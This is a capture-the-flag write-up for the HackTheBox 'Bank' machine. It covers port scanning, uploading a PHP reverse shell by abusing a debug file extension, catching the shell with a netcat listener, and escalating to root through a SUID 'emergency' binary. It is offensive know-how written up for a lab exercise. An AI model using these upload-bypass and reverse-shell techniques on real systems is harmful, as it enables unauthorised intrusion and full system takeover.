Let’s get started!

Level: easy

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -O -oA bank 10.10.10.29

Nmap-Scan

As we can see there are 3 ports open as per the above nmap scan.

Port 22 ,53,80.

Let’s enumerate webserver.

URL: http://10.10.10.29

I saw that DNS was open so I edited /etc/hosts to contain the IP of the machine plus the name server of the machine. The default name server for all HackTheBox machines is <name of box>.htb so I edited the hosts file as followed

COMMAND: echo “10.10.10.29 bank.htb ” > /etc/hosts

Let’s open the webserver at bank.htb.

The URL is redirecting to the login.php page every time so I decided to stop the redirection but my there is no supported version of the add-on to my firefox browser.

So,i used burpsuite for the further process.

Now I’m able to access http://bank.htb/ with the help of a burp suite repeater and we can see the transactions at the bank and some other information…

Fire up the burpsuite and intercept the packets and press control + r to transfer the packet to repeator!

If we now go to /support.php we can see you can upload “tickets” as images, if you curl http://bank.htb/support.php and scroll through the HTML code you can see that the admin left himself a little nice note for himself.

We can use burp suite repeater and upload a PHP shell to get a reverse shell!

“<! — [DEBUG] I added the file extension .htb to execute as PHP for debugging purposes only [DEBUG] →”

I used php shell as followed [ PENTEST-MONKEY-PHP-SHELL]

Changed the IP to my IP and named it Exp1o1t9r.php I tried uploading it as Exp1o1t9r.php but the site only wanted images uploaded. Then I remember that .htb runs as PHP so I added the .htb extension for my PHP shell since it can execute as PHP “for debugging purposes” and the shell it’s uploaded. Now all I had to do is set up a Netcat listener to catch the shell.

nc -v -n -l -p 4444

once we catch the shell we go into the box as www-data in the directory /var/www/bank/uploads/

www-data@bank:/var/www/bank/uploads$

We can go into the user’s home directory chris and get the user flag user.txt,

Got User Flag!

To perform privilege escalation, one of the first things I always check is to find out which binaries which have SUID bit set.
find / -perm -u=s -type f 2>/dev/null

www-data@bank:/var/htb$ ls -la 
total 16
drwxr-xr-x 3 root root 4096 Jun 14 18:25 .
drwxr-xr-x 14 root root 4096 May 29 18:41 ..
drwxr-xr-x 2 root root 4096 Jun 14 18:30 bin
-rwxr-xr-x 1 root root 356 Jun 14 18:30 emergency

it seems like the system administrator has left an emergency exploit in case he forgets the root password of the system…

My privilege before running the exploit
uid=33(www-data) gid=33(www-data) groups=33(www-data)

My privileges after running the emergency exploit

./emergency


uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

and now we can get the root flag. cat /root/root.txt

Got Root Flag!

If you like my writeup, Give me Respect on my HTB profile: Exp1o1t9r

LEAVE A REPLY

Please enter your comment!
Please enter your name here